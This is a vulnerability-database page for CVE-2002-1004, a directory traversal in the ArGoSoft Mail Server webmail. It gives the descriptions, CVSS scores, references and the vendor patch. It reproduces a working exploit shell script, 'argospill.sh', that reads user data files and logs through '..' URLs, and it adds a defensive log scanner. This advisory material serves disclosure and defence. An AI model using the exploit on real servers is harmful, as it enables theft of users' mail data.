CVE-2002-1004
CVSS 5.0
Published: 2002-10-04 00:00:00
Last revised: 2008-09-05 16:29:31

[Original] Directory traversal vulnerability in webmail feature of ArGoSoft Mail Server Plus or Pro 1.8.1.5 and earlier allows remote attackers to read arbitrary files via .. (dot dot) sequences in a URL.


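[CNNVD] ArGoSoft Mail Server Remote Directory Traversal Vulnerability (CNNVD-200210-179)

        
        ArGoSoft Mail Server is a system that integrates SMTP, POP3 and Fingerd services for Microsoft Windows; it includes a web server that lets remote users access their mail over the web.
        The web service of ArGoSoft Mail Server does not correctly filter user-submitted URL requests, and a remote attacker can exploit this to carry out a directory traversal attack.
        Because the webmail server does not check for reverse directory traversal, an attacker can, by requesting an image or a legitimate user's attachment, submit a request that contains multiple '/..' sequences followed by the name of the system file to view. The contents of any requested system file can then be read with the privileges of the webmail service process.
        This vulnerability was reproduced in ArGoSoft Mail Server 1.8.1.5; other versions may also be affected.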
        

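- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]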

- CPE (Affected Platforms and Products)

cpe:/a:argosoft:argosoft_mail_server:1.8.1.5::pro
cpe:/a:argosoft:argosoft_mail_server:1.8.1.5::plus

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1004
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1004
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-179
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/5144
(VENDOR_ADVISORY)  BID  5144
http://www.iss.net/security_center/static/9477.php
(VENDOR_ADVISORY)  XF  argosoft-dotdot-directory-traversal(9477)
http://www.argosoft.com/applications/mailserver/changelist.asp
(UNKNOWN)  CONFIRM  http://www.argosoft.com/applications/mailserver/changelist.asp
http://archives.neohapsis.com/archives/bugtraq/2002-07/0029.html
(UNKNOWN)  BUGTRAQ  20020703 Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal

- Vulnerability Information

ArGoSoft Mail Server Remote Directory Traversal Vulnerability
Medium severity  Unknown
2002-10-04 00:00:00 2006-09-27 00:00:00
Remote
        
        

- Advisories and Patches

        Vendor patch:
        ArGoSoft
        --------
        The vendor has released an upgrade that fixes this security issue; download it from the vendor's home page:
        Upgrade to version 1.8.1.6:
        ArGoSoft Mail Server Plus 1.8.1.5:
        ArGoSoft Upgrade msplus
        
        http://www.argosoft.com/files/apps/msplus.exe

        ArGoSoft Mail Server Pro 1.8.1.5:
        ArGoSoft Upgrade mspro
        
        http://www.argosoft.com/files/apps/mspro.exe

- Vulnerability Information (21591)

ArGoSoft 1.8 Mail Server Directory Traversal Vulnerability (EDBID:21591)
windows remote
2002-07-06 Verified
0 team n.finity
N/A
source: http://www.securityfocus.com/bid/5144/info

ArGoSoft Mail Server is an SMTP, POP3 and Finger server for Microsoft Windows environments. ArGoSoft has a built-in web server to enable remote access to mail.

A directory traversal issue has been reported in the web server, which could allow remote users access to all files residing on the host.

This is accomplished by submitting a specially crafted request containing '/..' character sequences to a specific directory.

This issue is reported to exist in ArGoSoft Mail Server 1.8.1.5; earlier versions may also be affected.


#!/bin/sh
#
# released on 06/07/2002 by team n.finity <nfinity@gmx.net>
# find us at http://nfinity.yoll.net/
#
# argospill.sh

HOST=$1
USER=$2
DOMAIN=$3

startpro()
{
    echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
    URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startplus()
{
    echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
    URL=/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startboth()
{
    echo -e "\nSpilling host $HOST (Plus / Pro)\n"
    URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
    /usr/bin/lynx -dump http://$HOST$URL
}

usage()
{
    echo -e "\nUsage:\n"
    echo "Both - $0 <host>"
    echo "Pro  - $0 <host> <user> <domain>"
    echo "Plus - $0 <host> <user>"
    echo -e "\nExample:\n"
    echo "Both, images dir - $0 www.test.com"
    echo "Plus, no dom req - $0 www.test.com me"
    echo "Pro, default dom - $0 www.test.com me _nodomain"
    echo "Pro, virtual dom - $0 www.test.com me test.com"
}

echo "Argospill 1.0 by Team N.finity"

if [ -n "$HOST" ]; then
    if [ -n "$USER" ]; then
        if [ -n "$DOMAIN" ]; then
            startpro
        else
            startplus
        fi
    else
        startboth
    fi
else
    usage
fi		
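
A defender-side check for the request shapes described above, added here as an example (it is not part of the original advisory or of the ArGoSoft product): it scans web access-log lines for URL paths with a `..` segment and shows where each one resolves. The Common Log Format layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Common Log Format (an assumption: the page does
# not show the product's own log layout). Addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jul/2002:10:01:02 +0000] "GET /images/logo.gif HTTP/1.0" 200 1043
192.0.2.44 - - [05/Jul/2002:10:03:17 +0000] "GET /images/../_logs/2002-07-04.txt HTTP/1.0" 200 8812
192.0.2.44 - - [05/Jul/2002:10:03:20 +0000] "GET /me/_tempatt/%2e%2e/userdata.rec HTTP/1.0" 200 377
192.0.2.10 - - [05/Jul/2002:10:05:40 +0000] "GET /me/_tempatt/report..final.doc HTTP/1.0" 200 20480
"""

# client address, request target and status code of one log line
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+)[^"]*" (\d{3}) ')


def decoded_path(target):
    """Percent-decode the URL path and unify separators (the host is Windows)."""
    return unquote(urlsplit(target).path).replace("\\", "/")


def has_dotdot_segment(target):
    """True when a whole path segment is '..', not merely a name containing dots."""
    return ".." in decoded_path(target).split("/")


def find_traversal(log_text):
    """Return (client, target, resolved_path, status) for each traversal request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m and has_dotdot_segment(m.group(2)):
            client, target, status = m.groups()
            resolved = posixpath.normpath(decoded_path(target))
            hits.append((client, target, resolved, int(status)))
    return hits


if __name__ == "__main__":
    for client, target, resolved, status in find_traversal(SAMPLE_LOG):
        print(f"{client} {status} {target} -> {resolved}")
```

A flagged request that was answered with status 200 by a server still on 1.8.1.5 or earlier means the resolved file was served and should be treated as disclosed.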

- Vulnerability Information

5032
ArGoSoft Mail Server URL Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality Upgrade
Vendor Verified

- Vulnerability Description

- Timeline

2002-07-04 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.8.1.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Credit

Unknown or Incomplete
 

 
